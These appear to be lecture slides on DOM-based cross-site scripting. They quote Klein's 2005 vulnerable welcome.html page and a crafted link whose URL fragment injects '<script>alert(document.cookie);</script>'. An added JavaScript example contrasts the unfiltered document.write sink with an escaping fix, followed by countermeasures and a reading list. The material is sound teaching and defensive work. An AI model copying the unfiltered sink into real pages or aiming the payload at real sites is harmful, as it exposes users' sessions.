Classic example from the original DOM-XSS paper [Klein 2005] “DOM
Based Cross Site Scripting or XSS of the Third Kind”
http://www.vulnerable.site/welcome.html
<HTML>
<TITLE>Welcome!</TITLE>
Hi
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT>
<BR>
Welcome to our system
...
</HTML>
89. Some web injections vulnerabilities XSS - Cross-Site scripting
DOM XSS example II
normal usage:
http://www.vulnerable.site/welcome.html?name=Sophie
malicious crafted link:
http://www.vulnerable.site/welcome.html?name=Sophie#blabla<script>alert(document.cookie);</script>
... and there is a lot of trickier stuff!
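As an added example (my code, not the slides' or [Klein 2005]'s), the welcome.html logic modelled outside the browser so that the two points of the DOM XSS slides can be checked: the fragment after # never reaches the server, which is why server-side filtering and log searching miss it (the causes slide's source/sink view), and the fix is a different sink and source handling in the client. The helper names and the "server-visible request line" model are assumptions of this example.

```javascript
// Added example: the slide's DOM XSS source->sink chain, modelled in plain JS.
// `documentUrl` stands in for document.URL; the returned string is what the
// page would hand to document.write.

// Constructed inputs: the slide's normal link and its crafted link.
const NORMAL  = "http://www.vulnerable.site/welcome.html?name=Sophie";
const CRAFTED = "http://www.vulnerable.site/welcome.html?name=Sophie"
              + "#blabla<script>alert(document.cookie);</script>";

// What the HTTP server (and its access log) sees of a navigation: path and
// query only. The fragment is not sent on the wire, so no server-side
// filter, WAF or offline log search ever observes the payload.
function requestLineSeenByServer(url) {
  const u = new URL(url);
  return u.pathname + u.search;
}

// The slide's vulnerable code: source = document.URL (attacker-influenced),
// sink = document.write, no filter in between.
function vulnerableWelcome(documentUrl) {
  const pos = documentUrl.indexOf("name=") + 5;
  return documentUrl.substring(pos, documentUrl.length);
}

// Hardened variant: read `name` from the parsed query only (the fragment is
// never consulted) and HTML-escape it, so the sink receives text, not markup.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, c => map[c]);
}
function safeWelcome(documentUrl) {
  const name = new URL(documentUrl).searchParams.get("name") || "";
  return escapeHtml(name);
}
```

In a real page the hardened sink would be a text node (e.g. `textContent`) rather than `document.write` of an escaped string; the escaping shown is the minimum that keeps the payload out of the HTML parser.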
90. Some web injections vulnerabilities XSS - Cross-Site scripting
XSS counter-measures I
Input sanitization
client side: letting the user decide whether to run anything other than HTML, eg: [NoScript]
server side:
“proxy/stub” between the http server and the clients
filtering:
only allow a subset of characters
input and output filtering [HTMLPurifier], [AntiSamy project]...
91. Some web injections vulnerabilities XSS - Cross-Site scripting
XSS counter-measures II
both: HttpOnly cookies [httponly] (on most modern browsers the cookie can no longer be read through document.cookie or through the XMLHttpRequest response, but the session is still vulnerable to an injected script issuing XMLHttpRequests)
Stored
offline search in databases: tedious (encoding, patterns), response time?
DOM
Frozen-DOM [0x6D6172696F 2011]
X-Content-Security-Policy [Paola 2011]
92. Appendix For Further Reading
0x6D6172696F, Mario Heiderich (2011). Locking the Throne Room - ECMA Script 5, a frozen DOM and the eradicati http://www.hackinparis.com/slides/hip2k11/02-LockingTheThroneRoom.pdf, http://mario.heideri.ch.
Amit, Yair (2010). Cross-Site Scripting through Flash in Gmail Based Services. http://blog.watchfire.com/wfblog/2010/03/cross-site-scripting-through-flash-in-gmail-based-services.html.
CrazyDaVinci (2011). Autopost Spamming using Facebook Mobile XSS. http://crazydavinci.net/2011/03/autopost-spamming-using-facebook-mobile-xss/.
Fabien Duchene, Roland Groz, Sanjay Rawat, Jean-Luc Richier (2012). XSS Vulnerability Detection Using Model Inference Assisted Evolutionary Fuz
Hackipedia - SQL injection. http://hakipedia.com/index.php/SQL_Injection.
Heiderich, Mario. HTML5 security. http://html5sec.org/.
93. Appendix For Further Reading
IBM, Paul Lee (2002). Cross-site scripting. https://www.ibm.com/developerworks/tivoli/library/s-csscript/.
Johan Adriaans, Pedro Laguna. Firefox hackbar add-on. https://addons.mozilla.org/en-US/firefox/addon/hackbar/.
Klein, Amit (2005). “DOM Based Cross Site Scripting or XSS of the Third Kind”. In: http://www.webappsec.org/projects/articles/071105.shtml.
Kunz, Benjamin (2011). Skype Vulnerabilities: Zero Day Exploitation 2011, HITBSecConf 2011 (Mala http://conference.hitb.org/hitbsecconf2011kul/?page_id=1757.
Maone, Giorgio. NoScript. https://addons.mozilla.org/en-US/firefox/addon/noscript/.
Mavituna - SQL injection sheet (2007). http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/.
OWASP. AntiSamy project. https://www.owasp.org/index.php/Category:OWASP_AntiSamy_Project.
— httponly. https://www.owasp.org/index.php/HTTPOnly.
94. Appendix For Further Reading
OWASP. WebGoat - the vulnerable web application. https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project.
— (2011). Injection - OWASP top 10 - 2010. https://www.owasp.org/index.php/Top_10_2010-A1.
Paola, Stefano Di (2011). DOM Xss Identification and Exploitation. http://media.hacking-lab.com/scs3/scs3_pdf/SCS3_2011_Di_Paola.pdf.
Philippe De Ryck, Lieven Desmet. CsFire firefox add-on. https://addons.mozilla.org/en-US/firefox/addon/csfire/.
RSnake. XSS. http://ha.ckers.org/xss.html.
Ryck, Philippe De et al. (2011). “Automatic and Precise Client-Side Protection against CSRF Attacks”. In: ESORICS. https://lirias.kuleuven.be/bitstream/123456789/311551/1/paper.pdf.
Samuel, Justin. RequestPolicy firefox add-on. https://addons.mozilla.org/en-US/firefox/addon/requestpolicy/.
95. Appendix For Further Reading
Symantec (2009). Symantec Global Internet Security Threat Report - trends for 2008. http://eval.symantec.com/mktginfo/enterprise/white_papers/b-whitepaper_internet_security_threat_report_xiv_04-2009.en-us.pdf.
Wassermann, Gary Michael (2008). Techniques and Tools for Engineering Secure Web Applications. Ph.D. thesis.
Webgoat - numeric SQL injection. http://yehg.net/lab/pr0js/training/view/owasp/webgoat/WebGoat_InjectionFlaws_NumericSQLInject/WebGoat_InjectionFlaws_NumericSQLInject.html.
Wikipedia. Document Object Model. https://secure.wikimedia.org/wikipedia/en/wiki/Document_Object_Model.
Yang, Edward Z. HTMLPurifier. http://htmlpurifier.org/.
96. Bonus slides XSS
Also see
Some tricks to escape browser protections [XSS]
[HTML5 security]